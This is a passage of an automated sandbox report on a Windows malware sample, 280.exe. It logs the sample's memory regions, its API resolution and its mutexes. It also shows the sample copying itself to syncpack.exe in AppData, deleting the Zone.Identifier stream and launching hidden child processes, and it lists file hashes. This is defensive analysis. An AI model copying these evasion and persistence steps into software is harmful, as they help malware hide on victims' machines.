Read Response size = 25092, size_out = 1468 True 1
Fn
Data
Read Response size = 23624, size_out = 7292 True 1
Fn
Data
Read Response size = 16332, size_out = 1468 True 1
Fn
Data
Read Response size = 14864, size_out = 7292 True 1
Fn
Data
Read Response size = 7572, size_out = 5840 True 1
Fn
Data
Read Response size = 1732, size_out = 1468 True 1
Fn
Data
Read Response size = 264, size_out = 264 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: 280.exe
Information Value
ID #3
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:15, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:53
OS Process Information
Information Value
PID 0xb40
Parent PID 0xa08 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB44
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001bcfff Private Memory Readable, Writable, Executable True False False -
private_0x00000000001c0000 0x001c0000 0x001ccfff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0027ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000280000 0x00280000 0x00287fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000870000 0x00870000 0x01c6ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c70000 0x01f3efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe os_pid = 0xb50, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1
Fn
Module (19)
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Get Filename - process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 260 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System (326)
Operation Additional Information Success Count Logfile
Get Time type = Ticks, time = 192162 True 3
Fn
Get Time type = Ticks, time = 192177 True 87
Fn
Get Time type = Ticks, time = 192193 True 66
Fn
Get Time type = Ticks, time = 192208 True 22
Fn
Get Time type = Ticks, time = 192224 True 71
Fn
Get Time type = Ticks, time = 195672 True 1
Fn
Get Time type = Ticks, time = 195687 True 4
Fn
Get Time type = Ticks, time = 195703 True 12
Fn
Get Time type = Ticks, time = 195718 True 11
Fn
Get Time type = Ticks, time = 195734 True 1
Fn
Get Info type = Operating System True 48
Fn
Mutex (2)
Operation Additional Information Success Count Logfile
Create mutex_name = PEMA08 True 1
Fn
Create mutex_name = PEMB40 True 1
Fn
Process #4: 280.exe
Information Value
ID #4
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:19, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:49
OS Process Information
Information Value
PID 0xb50
Parent PID 0xb40 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB54
0xB58
0xB5C
0xB60
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002c9fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
pagefile_0x00000000003b0000 0x003b0000 0x003b6fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable, Writable True False False -
cversions.1.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
cversions.2.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x003e0000 0x003fefff Memory Mapped File Readable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x00570000 0x00573fff Memory Mapped File Readable True False False -
pagefile_0x0000000000580000 0x00580000 0x00580fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x0059ffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00837fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x009c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009d0000 0x009d0000 0x01dcffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01dd0000 0x0209efff Memory Mapped File Readable False False False -
private_0x00000000020a0000 0x020a0000 0x022affff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x0217efff Pagefile Backed Memory Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x02180000 0x021affff Memory Mapped File Readable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x021b0000 0x02215fff Memory Mapped File Readable True False False -
private_0x0000000002270000 0x02270000 0x022affff Private Memory Readable, Writable True False False -
private_0x00000000022b0000 0x022b0000 0x023affff Private Memory Readable, Writable True False False -
pagefile_0x00000000023b0000 0x023b0000 0x027a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x752b0000 0x752c6fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f, SHA1: d112719238664d7996048614d75db8a67fc50fc5, SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473 False
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe type = size True 1
Fn
Get Info C:\ type = file_attributes True 1
Fn
Get Info C:\Users\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\ type = file_attributes True 1
Fn
Get Info C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Fn
Move C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe source_filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe True 1
Fn
Delete C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe:Zone.Identifier - False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe os_pid = 0xb64, show_window = SW_HIDE True 1
Fn
Module (23)
»
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x771c0000 True 1
Fn
Load KERNEL32.dll base_address = 0x75fb0000 True 1
Fn
Load advapi32.dll base_address = 0x77740000 True 1
Fn
Load crypt32.dll base_address = 0x76260000 True 1
Fn
Load wtsapi32.dll base_address = 0x75420000 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
Create Mapping C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
»
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (576)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XABNCPUWKW True 1
Fn
Get Time type = Ticks, time = 195843 True 31
Fn
Get Time type = Ticks, time = 195859 True 8
Fn
Get Time type = Ticks, time = 195874 True 24
Fn
Get Time type = Ticks, time = 195890 True 63
Fn
Get Time type = Ticks, time = 195906 True 22
Fn
Get Time type = Ticks, time = 195921 True 26
Fn
Get Time type = Ticks, time = 195937 True 29
Fn
Get Time type = Ticks, time = 195952 True 46
Fn
Get Time type = Ticks, time = 198183 True 7
Fn
Get Time type = Ticks, time = 198199 True 8
Fn
Get Time type = Ticks, time = 198214 True 29
Fn
Get Time type = Ticks, time = 198230 True 93
Fn
Get Time type = Ticks, time = 198246 True 77
Fn
Get Time type = Ticks, time = 198261 True 60
Fn
Get Time type = Ticks, time = 198308 True 2
Fn
Get Time type = Ticks, time = 198558 True 1
Fn
Get Info type = Operating System True 48
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (4)
»
Operation Additional Information Success Count Logfile
Create mutex_name = PEMB40 True 1
Fn
Create mutex_name = Global\I78B0A7D7 True 1
Fn
Create mutex_name = Global\M78B0A7D7 True 1
Fn
Release mutex_name = Global\I78B0A7D7 True 1
Fn
Process #5: syncpack.exe
346 0
»
Information Value
ID #5
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:21, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:47
OS Process Information
»
Information Value
PID 0xb64
Parent PID 0xb50 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB68
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c40000 0x01f0efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
